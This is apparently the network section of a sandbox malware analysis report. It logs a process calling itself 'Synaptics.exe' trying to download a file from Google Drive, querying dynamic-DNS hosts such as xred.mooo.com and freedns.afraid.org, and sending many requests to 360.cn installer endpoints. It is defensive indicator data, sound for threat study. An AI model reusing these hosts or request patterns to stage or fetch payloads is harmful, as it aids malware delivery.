                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficDNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                      Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                      Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                      Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                      Source: global trafficDNS traffic detected: DNS query: s.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: st.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: tr.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: agt.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: agd.p.360.cn
                                      Source: global trafficDNS traffic detected: DNS query: pinst.360.cn
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6TKuRk0hgUk2Tb9kjOxkBIeSTsrnF1u8g4YV721yB-sW5Fz-CpvLZgaHxjghT7i1sgMsch1HMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:09 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UV5JMyfHuzI85Fe0L9FSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=PHLPwFBV3nP3NSbmBNppx94wfdqPQl4Q-izB7Q9f0_bxaxWANYb1QcaTubhKjd2R6xySamhdnl-RYaDARyDu81yP1iK-V-e7E34pqVgPJwxEHcLMQ5b4PH3P0YYqID63fImAuLFJ1XTfSeu5RvIPc-V_WgPJ4D2Xww1UxfxNrV61NdVFmp2YgJg; expires=Tue, 01-Jul-2025 03:59:08 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XE9ltO5sP3N1Ar8PTH5TeZoZyYCHQYswm3HTkYY2aozOCHcnr1TUfkjZboyloQwjgjW0gL5EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DrHxITUWqkpY9zOVZL--eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78TJ0s7w9-xVrnPC4666qZhtzBpabA4vOB160H6JXYtU6Fdo4rnzdYpAuZ1VKsEXBNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3QCZBTHJd1WzjAiyJ7Ckhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7u95LCBikf2VrlPZgsV-yI6nxuqMn2Ojd7VJ5HUViP0ZCF2RixzeZv0yho1ewOmz7HContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:27 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-z7XQUqKBFeWkyxMcf_-bXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6crF2b7FSSTausPhad_4aDlZpOp8Brm48BUTsUxCBmURGshwiTp9F1tflMuoY3Q8yLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LvSAwuG9HlrbjnO4JLmlYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aikY1hqp2JJwd_UVjRDghR_eADDFrb1kjxIdoXxulk6H0qKleGVRTUJNzv2Grlb4iH4J0CYEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wcZe5jZLEzFE417kITNx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6EPYnsdxaBmwEzi3oy1xasAkPzCYoNSGeyMsE1cGSNvC1X7G2LjMv8A-wfiQsKaUpEsVzlc10Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:30 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Vgj3aQ7owv7-FjrEcxeqhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Cu1NUzd1xt5FYFxcONGcm_PxAcuGzuznSwVVcy8m3_pue8yP4m8t1Nm8JX3NBtxs1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lp1vjZwqRCu2CrdcRbpMNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5tB4ZSa22yKLtARIbndnmCJ_oZwwz63dpCk6Q_ClVYxd45NWERMSX98p1rv-5YSq8ofNhGwZQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:31 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EaziQ_cIt_9Dlp5jb-QkzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC729wdkrE3hx8FyEGT0hnE-4MeTLK1MKnDV4cFtLG8bZ-wtfmQzpbuxegoYmQxJxJ6VContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-t4qd5EpHE6LSIUYWXf1fuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sj2j0nbUHWk1a5MgCGDq7rq6fA_d6BnPp2IlmRb9N17Ccrw-Bk9CY9lue5ylHeftKDl3sDyoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-B-5r0DGtruTCPj1clq-u1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6H__jp48lMPl_U3TEFh-FoqSc_MvrIze9ez4eSG4gcR3B17k6gHjs1gX-KasSHhGU-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:33 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yMgLJlmvrUBIyazQiUz9OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Ay4RxBpc96w1vGaisqgXZN6kJlSI3CW79YcffGF3PvAOJmsFfwtL5PIqpHjCQVifjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YHmc-ArVDg9jrLUeHyxWNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n2jGEQCWLlQS-h6XieblUAo3rIkMj6uEeYyi8ldX-QWx4vY9N6Mkjw5-Sx07s_GvKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jjmdGFN99Fr0H8FCWxmiWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
